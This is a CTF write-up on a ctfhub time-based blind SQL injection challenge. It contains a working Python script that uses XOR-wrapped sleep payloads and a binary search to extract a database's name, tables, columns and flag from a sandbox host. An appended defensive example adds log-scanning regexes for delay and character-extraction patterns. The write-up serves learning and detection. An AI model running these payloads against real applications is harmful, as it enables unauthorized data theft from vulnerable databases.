ctfhub [time-based blind injection]
The challenge title already says it is a time-based blind injection, so that is what we do.
As before, the XOR trick is used to carry the time-based payload.
The script is as follows:
# -*- coding:utf-8 -*-
import requests
import time

flag = ""
for i in range(1, 50):
    # Binary search over the printable ASCII range for the i-th character
    low = 32
    high = 127
    mid = (low + high) // 2
    while low < high:
        starttime = time.time()
        # pa = '1^if(ascii(substr(database(),{},1))>{},sleep(2),-1)^1'.format(str(i), str(mid))  # dump the database name
        # pa = "1^if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),{},1))>{},sleep(2),-1)^1".format(str(i), str(mid))  # dump the table names
        # pa = "1^if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),{},1))>{},sleep(2),-1)^1".format(str(i), str(mid))  # dump the column names
        pa = "1^if(ascii(substr((select group_concat(flag) from flag),{},1))>{},sleep(2),-1)^1".format(str(i), str(mid))
        url = "http://challenge-5f35b16863cadad6.sandbox.ctfhub.com:10800?id="
        ur = url + pa
        res = requests.get(ur)
        # A response slower than 2 seconds means sleep(2) ran, i.e. the character is above mid
        if time.time() - starttime > 2:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    flag += chr(mid)
    print(flag)
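As an added example from the defender's side (not part of this write-up), the following detector flags the trace a script like the one above leaves in a web server access log: requests whose decoded query combines a delay function with ascii(substr()) extraction, and whose response time reaches the 2-second sleep. The log format (Nginx-style line with the request time appended) and the sample lines are constructed assumptions.

```python
# Added example, not from the original write-up: flag the trace a time-based
# blind probe like the script above leaves in an access log.
import re
from urllib.parse import unquote_plus

# Functions the page's payloads rely on: a conditional delay plus the
# ascii(substr()) extraction that the binary search drives.
DELAY_FUNCS = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
EXTRACT_FUNCS = re.compile(r"\b(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\(", re.IGNORECASE)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \d+ (?P<rt>[\d.]+)$'
)

def classify(line, slow_threshold=2.0):
    """Return why a log line looks like a timing probe, or None if it does not."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = unquote_plus(m.group("path").partition("?")[2])
    reasons = []
    if DELAY_FUNCS.search(query):
        reasons.append("delay-function")
    if EXTRACT_FUNCS.search(query):
        reasons.append("char-extraction")
    if float(m.group("rt")) >= slow_threshold:  # the sleep(2) branch fired
        reasons.append("slow-response")
    return {"ip": m.group("ip"), "query": query, "reasons": reasons} if reasons else None

def scan(lines, slow_threshold=2.0):
    """Group suspicious hits per client: a binary search shows up as a burst from one IP."""
    hits = {}
    for line in lines:
        c = classify(line, slow_threshold)
        if c:
            hits.setdefault(c["ip"], []).append(c)
    return hits

# Constructed sample in an assumed Nginx-style format with $request_time appended:
# one true-branch probe (slept), one false-branch probe (fast), one ordinary request.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=1%5Eif(ascii(substr(database(),1,1))%3E79,sleep(2),-1)%5E1 HTTP/1.1" 200 512 2.013',
    '198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=1%5Eif(ascii(substr(database(),1,1))%3E103,sleep(2),-1)%5E1 HTTP/1.1" 200 512 0.011',
    '203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /?id=1 HTTP/1.1" 200 512 0.009',
]

if __name__ == "__main__":
    for ip, probes in scan(SAMPLE_LOG).items():
        print(ip, len(probes), "suspicious request(s):", [p["reasons"] for p in probes])
```

Requests that only trip "slow-response" are worth correlating with the same client's earlier requests, since the false branch of the probe returns quickly and leaves only the query-string signature.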
sqlmap would also work; I won't show it here, since it is all fairly simple and the previous blog post already covered how to use sqlmap:
sqlmap